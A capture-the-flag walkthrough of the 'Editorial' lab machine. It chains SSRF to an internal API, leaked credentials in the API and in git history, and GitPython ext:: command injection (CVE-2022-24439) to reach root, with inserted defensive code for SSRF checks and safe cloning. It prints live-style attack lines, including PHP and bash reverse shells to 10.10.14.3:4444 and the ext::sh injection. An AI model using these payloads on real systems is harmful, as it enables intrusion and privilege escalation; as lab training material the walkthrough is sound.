Editorial

Initial Enumeration

Nmap

┌──(kali㉿kali)-[~]
└─$ nmap -Pn -n 10.10.11.20 -sV --script vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-19 20:37 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Stats: 0:07:12 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.63% done; ETC: 20:45 (0:00:01 remaining)
Nmap scan report for 10.10.11.20
Host is up (0.16s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:8.9p1: 
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 470.08 seconds

After running Nmap, we can identify two open ports: 22 (SSH) and 80 (HTTP). Since we have no provided or valid credentials for the SSH service, we will first look at the HTTP service running nginx to see whether we can find any interesting information.

HTTP

Typing http://10.10.11.20:80 into our browser, we are redirected to http://editorial.htb/, which does not resolve, so the page fails to load. We will add that hostname to our /etc/hosts file.

┌──(kali㉿kali)-[~]
└─$ sudo nano /etc/hosts               
[sudo] password for kali: 
                                                                                                  
┌──(kali㉿kali)-[~]
└─$ cat /etc/hosts          
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.10.11.20 editorial.htb

We can then navigate over into http://editorial.htb/. Browsing through the webpage, we are able to find a few things:

  • Home page: /

  • File upload: /upload

  • About: /about

    • Under /about, we can see a potential user under ‘Contact us’, with the email address submissions@tiempoarriba.htb

Initial Foothold

After some testing on the /upload page, we noted that the browse section accepts a file with any extension and uploads it to the webpage. We can attempt to gain a reverse shell through this upload functionality.

<?php
system('bash -i >& /dev/tcp/10.10.14.3/4444 0>&1');
?>

However, after repeated testing, we realized that there is no way to make the webpage call or execute our uploaded payload. We will thus have to find alternative methods of gaining access to the system.

Server-Side Request Forgery

After playing around with the page for a while, we can take note of the Cover URL input alongside the preview button. If we run a listener on our attacking machine and try to preview a URL pointing at our own nc port, we receive a connection from the server:

┌──(kali㉿kali)-[~]
└─$ nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.20] 41486
GET / HTTP/1.1
Host: 10.10.14.3:1337
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

We can then attempt a port scan through this SSRF by requesting different ports on the internal 127.0.0.1 address, to check whether any other services are listening locally. This can be done with Burp Suite's Intruder tool:

POST /upload-cover HTTP/1.1
Host: editorial.htb
Content-Length: 302
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryr7zdsWPAyAqH1gOy
Accept: */*
Origin: http://editorial.htb
Referer: http://editorial.htb/upload
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundaryr7zdsWPAyAqH1gOy
Content-Disposition: form-data; name="bookurl"

http://127.0.0.1:§1§
------WebKitFormBoundaryr7zdsWPAyAqH1gOy
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundaryr7zdsWPAyAqH1gOy--

From there, we use a numbers payload list for the marked port position and iterate through all 65535 ports, comparing the responses.

After running the enumeration through all ports, we found that port 5000 returns a slightly different response: unlike the other ports, the response body does not contain a .jpeg path:

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 20 Oct 2024 02:30:14 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Content-Length: 51

static/uploads/3127e453-340d-4ecc-9101-2aac39e71f62

We can then inspect this file by going back to the webpage and requesting it; opening the image in a new tab downloads the file to our local machine.
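The check a defender would add to the cover-URL fetch, as an added example that is not the Editorial application's code: it refuses loopback, private, link-local and IPv4-mapped addresses and non-default ports before any request is made, which is what would have stopped the /upload-cover requests above from reaching 127.0.0.1:5000. Function names and the allowed-port list are assumptions.

```python
"""Added example, not code from the Editorial application: a destination
check for a "fetch this cover from a URL" feature. Function names and the
allowed-port list are assumptions; stdlib only."""
from __future__ import annotations

import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}       # the internal sweep above needed arbitrary ports


def _resolve(host: str) -> list:
    """Literal IPs are parsed directly (no DNS); names go through getaddrinfo."""
    try:
        return [ipaddress.ip_address(host)]
    except ValueError:
        infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
        # strip a possible IPv6 scope id such as "%eth0" before parsing
        return [ipaddress.ip_address(info[4][0].split("%")[0]) for info in infos]


def _is_internal(ip) -> bool:
    """Loopback, RFC 1918, link-local, multicast, reserved or unspecified."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped           # ::ffff:127.0.0.1 is still loopback
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_fetch_url(url: str) -> tuple:
    """Return (allowed, reason). Call this before issuing the request, then
    connect to the resolved IP rather than re-resolving the name, and disable
    redirects: a rebinding DNS name or a 302 can otherwise still point the
    fetch at loopback."""
    try:
        parts = urlsplit(url)
        port = parts.port          # raises ValueError on a non-numeric port
    except ValueError as exc:
        return False, f"malformed URL: {exc}"
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "missing host"
    if port is not None and port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    try:
        addrs = _resolve(parts.hostname)
    except (socket.gaierror, ValueError) as exc:
        return False, f"cannot resolve {parts.hostname!r}: {exc}"
    for ip in addrs:
        if _is_internal(ip):
            return False, f"{parts.hostname} resolves to internal address {ip}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs: the shapes seen in the writeup plus a public address.
    for u in ("http://127.0.0.1:5000/api/latest/metadata/messages/authors",
              "http://10.10.14.3:1337/", "http://[::ffff:127.0.0.1]/",
              "http://93.184.216.34/"):
        print(u, "->", check_fetch_url(u))
```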

┌──(kali㉿kali)-[~/Downloads]
└─$ cat 3db54403-6efc-44c5-a3bc-c022f227bd2e 
{
  "messages": [
    {"promotions": {"description": "Retrieve a list of all the promotions in our library.", "endpoint": "/api/latest/metadata/messages/promos", "methods": "GET"}},
    {"coupons": {"description": "Retrieve the list of coupons to use in our library.", "endpoint": "/api/latest/metadata/messages/coupons", "methods": "GET"}},
    {"new_authors": {"description": "Retrieve the welcome message sended to our new authors.", "endpoint": "/api/latest/metadata/messages/authors", "methods": "GET"}},
    {"platform_use": {"description": "Retrieve examples of how to use the platform.", "endpoint": "/api/latest/metadata/messages/how_to_use_platform", "methods": "GET"}}
  ],
  "version": [
    {"changelog": {"description": "Retrieve a list of all the versions and updates of the api.", "endpoint": "/api/latest/metadata/changelog", "methods": "GET"}},
    {"latest": {"description": "Retrieve the last version of api.", "endpoint": "/api/latest/metadata", "methods": "GET"}}
  ]
}

From this document, one entry stands out: {"new_authors":{"description":"Retrieve the welcome message sended to our new authors.","endpoint":"/api/latest/metadata/messages/authors","methods":"GET"}}. We can fetch that endpoint through the same SSRF and see what is inside:

POST /upload-cover HTTP/1.1
Host: editorial.htb
Content-Length: 344
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypVrPzqlXXsXmEDXB
Accept: */*
Origin: http://editorial.htb
Referer: http://editorial.htb/upload
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundarypVrPzqlXXsXmEDXB
Content-Disposition: form-data; name="bookurl"

http://127.0.0.1:5000/api/latest/metadata/messages/authors
------WebKitFormBoundarypVrPzqlXXsXmEDXB
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundarypVrPzqlXXsXmEDXB--
REQUEST
GET /static/uploads/816baf68-b1a3-4f6f-95f6-7d04e098cd5d HTTP/1.1
Host: editorial.htb
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://editorial.htb/upload
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

RESPONSE
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 20 Oct 2024 02:35:31 GMT
Content-Type: application/octet-stream
Content-Length: 506
Connection: keep-alive
Content-Disposition: inline; filename=816baf68-b1a3-4f6f-95f6-7d04e098cd5d
Last-Modified: Sun, 20 Oct 2024 02:35:31 GMT
Cache-Control: no-cache
ETag: "1729391731.6434903-506-4150728885"

{"template_mail_message":"Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team."}

From the template_mail_message, we are able to identify a set of credentials:

Username: dev
Password: dev080217_devAPI!@

From there, we can try a few things:

  • Logging in directly with provided credentials

  • Username enumeration, looking for users who have yet to change their password

┌──(kali㉿kali)-[~/Downloads]
└─$ ssh dev@10.10.11.20 
The authenticity of host '10.10.11.20 (10.10.11.20)' can't be established.
ED25519 key fingerprint is SHA256:YR+ibhVYSWNLe4xyiPA0g45F4p1pNAcQ7+xupfIR70Q.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.20' (ED25519) to the list of known hosts.
dev@10.10.11.20's password: 
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sun Oct 20 02:41:39 AM UTC 2024

  System load:           0.0
  Usage of /:            60.7% of 6.35GB
  Memory usage:          13%
  Swap usage:            0%
  Processes:             225
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.20
  IPv6 address for eth0: dead:beef::250:56ff:fe94:65f7

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Jun 10 09:11:03 2024 from 10.10.14.52
dev@editorial:~$ ls -la
total 32
drwxr-x--- 4 dev  dev  4096 Jun  5 14:36 .
drwxr-xr-x 4 root root 4096 Jun  5 14:36 ..
drwxrwxr-x 3 dev  dev  4096 Jun  5 14:36 apps
lrwxrwxrwx 1 root root    9 Feb  6  2023 .bash_history -> /dev/null
-rw-r--r-- 1 dev  dev   220 Jan  6  2022 .bash_logout
-rw-r--r-- 1 dev  dev  3771 Jan  6  2022 .bashrc
drwx------ 2 dev  dev  4096 Jun  5 14:36 .cache
-rw-r--r-- 1 dev  dev   807 Jan  6  2022 .profile
-rw-r----- 1 root dev    33 Oct 18 05:45 user.txt
dev@editorial:~$ cat user.txt
f090d1bf7fabafbb3bcecd8b4192e184
dev@editorial:~$ sudo -l
[sudo] password for dev: 
Sorry, user dev may not run sudo on editorial.

Luckily, the credentials work directly over SSH, which gives us the first flag, user.txt. Trying our luck with sudo -l, we find that the dev user is not allowed to run sudo.

Lateral Movement

dev@editorial:~/apps$ git log
commit 8ad0f3187e2bda88bba85074635ea942974587e8 (HEAD -> master)
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 21:04:21 2023 -0500

    fix: bugfix in api port endpoint

commit dfef9f20e57d730b7d71967582035925d57ad883
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 21:01:11 2023 -0500

    change: remove debug and update api port

commit b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 20:55:08 2023 -0500

    change(api): downgrading prod to dev
    
    * To use development environment.

commit 1e84a036b2f33c59e2390730699a488c65643d28
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 20:51:10 2023 -0500

    feat: create api to editorial info
    
    * It (will) contains internal info about the editorial, this enable
       faster access to information.

commit 3251ec9e8ffdd9b938e83e3b9fbf5fd1efa9bbb8
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 20:48:43 2023 -0500

    feat: create editorial app
    
    * This contains the base of this project.
    * Also we add a feature to enable to external authors send us their
       books and validate a future post in our editorial.

Looking through the dev user's home folder, we find a .git repository under ~/apps whose history refers to the API endpoints. One of the more interesting log entries is the change(api): downgrading prod to dev commit, which we will dig into.

dev@editorial:~/apps$ git show b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
commit b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 20:55:08 2023 -0500

    change(api): downgrading prod to dev
    
    * To use development environment.

diff --git a/app_api/app.py b/app_api/app.py
index 61b786f..3373b14 100644
--- a/app_api/app.py
+++ b/app_api/app.py
@@ -64,7 +64,7 @@ def index():
 @app.route(api_route + '/authors/message', methods=['GET'])
 def api_mail_new_authors():
     return jsonify({
-        'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\\n\\nYour login credentials for our internal forum and authors site are:\\nUsername: prod\\nPassword: 080217_Producti0n_2023!@\\nPlease be sure to change your password as soon as possible for security purposes.\\n\\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\\n\\nBest regards, " + api_editorial_name + " Team."
+        'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\\n\\nYour login credentials for our internal forum and authors site are:\\nUsername: dev\\nPassword: dev080217_devAPI!@\\nPlease be sure to change your password as soon as possible for security purposes.\\n\\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\\n\\nBest regards, " + api_editorial_name + " Team."
     }) # TODO: replace dev credentials when checks pass
 
 # -------------------------------
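Review bot: the `-`/`+` pair in this hunk swaps one hard-coded credential pair for another inside a string literal, and the `# TODO: replace dev credentials when checks pass` comment on the closing line shows the plan is to swap them back the same way; both the prod and the dev passwords therefore stay in the repository history, which is exactly how they are recovered in this writeup. Suggest that api_mail_new_authors not embed credentials at all (this endpoint is reachable from the public site through the cover-URL fetch), or at minimum read them from the environment or a secret store, and that the prod password already committed be rotated rather than restored.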

Inside the commit history, we can identify a second set of credentials:

Username: prod
Password: 080217_Producti0n_2023!@

Privilege Escalation

We will switch to the second set of credentials and check whether they give us any path to privilege escalation.

dev@editorial:~$ su prod
Password: 
prod@editorial:/home/dev$ sudo -l
[sudo] password for prod: 
Matching Defaults entries for prod on editorial:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User prod may run the following commands on editorial:
    (root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *

After running sudo -l as the second user, we can see that prod may run /opt/internal_apps/clone_changes/clone_prod_change.py as root through /usr/bin/python3, with any arguments (the trailing *). Invoking the script directly, without the /usr/bin/python3 prefix the rule specifies, is rejected with the error: Sorry, user prod is not allowed to execute '/opt/internal_apps/clone_changes/clone_prod_change.py' as root on editorial.

We will then look through the file to see what is inside this code:

prod@editorial:/home/dev$ cat /opt/internal_apps/clone_changes/clone_prod_change.py
#!/usr/bin/python3

import os
import sys
from git import Repo

os.chdir('/opt/internal_apps/clone_changes')

url_to_clone = sys.argv[1]

r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])

From the code, we can identify a vulnerability from 2022, CVE-2022-24439 in GitPython: the script passes the user-controlled sys.argv[1] straight to clone_from without validation, and the multi_options value protocol.ext.allow=always enables git's ext:: transport, so a crafted remote URL is treated as a command to execute.
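A hardened version of the clone logic above, written here as an added example rather than the box's own /opt/internal_apps script: it validates the URL before GitPython sees it, rejects any helper::address form, and does not enable protocol.ext, so the argument that the sudo wildcard lets prod pass through cannot select a transport helper. The allowed git host and the repository-path pattern are assumptions; GitPython is only needed for the actual clone.

```python
"""Added example, not the script from /opt/internal_apps: clone_prod_change.py
hardened so that the argument sudo lets prod pass through cannot select a git
transport helper. The allowed host and path pattern are assumptions."""
from __future__ import annotations

import os
import re
import sys
from urllib.parse import urlsplit

CLONE_DIR = "/opt/internal_apps/clone_changes"        # path from the original script
ALLOWED_HOSTS = {"git.tiempoarriba.htb"}              # assumed internal git server
# /<group>/<repo>[.git]; segments may not start with "." (blocks "..")
REPO_PATH = re.compile(r"^/[A-Za-z0-9_-][A-Za-z0-9_.-]*/[A-Za-z0-9_-][A-Za-z0-9_.-]*$")


def validate_clone_url(url: str) -> str:
    """Return url unchanged if it is an https URL for an allow-listed host,
    otherwise raise ValueError. Anything git could read as a
    <helper>::<address> remote (ext::, fd::, ...) is rejected up front."""
    if "::" in url:
        raise ValueError("remote-helper syntax (helper::address) is not allowed")
    parts = urlsplit(url)
    if parts.scheme != "https":
        raise ValueError(f"scheme {parts.scheme!r} not allowed, https only")
    if parts.hostname not in ALLOWED_HOSTS:
        raise ValueError(f"host {parts.hostname!r} is not an allowed git server")
    if parts.username or parts.password or parts.query or parts.fragment:
        raise ValueError("userinfo, query and fragment are not allowed")
    if not REPO_PATH.match(parts.path):
        raise ValueError(f"unexpected repository path {parts.path!r}")
    return url


def is_allowed_clone_url(url: str) -> bool:
    """Boolean wrapper around validate_clone_url for callers and tests."""
    try:
        validate_clone_url(url)
        return True
    except ValueError:
        return False


def clone_change(url: str, dest: str = "new_changes"):
    """Clone only after validation and without multi_options: git's default
    protocol.allow policy leaves the ext transport disabled."""
    from git import Repo          # GitPython, as in the original script
    safe_url = validate_clone_url(url)
    os.chdir(CLONE_DIR)
    return Repo.clone_from(safe_url, dest)


if __name__ == "__main__":
    try:
        clone_change(sys.argv[1])
    except (IndexError, ValueError) as exc:
        sys.exit(f"refusing to clone: {exc}")
```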

On our victim machine:

prod@editorial:/home/dev$ cd /tmp
prod@editorial:/tmp$ nano shell.sh
prod@editorial:/tmp$ cat shell.sh
#!/bin/bash

# Define your listener IP and port
LISTENER_IP="10.10.14.3"
LISTENER_PORT="4444"

# Create the reverse shell
bash -i >& /dev/tcp/$LISTENER_IP/$LISTENER_PORT 0>&1
prod@editorial:/tmp$ sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c bash% /tmp/shell.sh'

From there, we open a listener on our attacking machine and catch the root shell:

┌──(kali㉿kali)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.20] 46936
root@editorial:/opt/internal_apps/clone_changes# whoami
whoami
root
root@editorial:/opt/internal_apps/clone_changes# cd /root
cd /root  
root@editorial:~# cat root.txt
cat root.txt
78cc518157d660d544a7b2b44e1f8e57
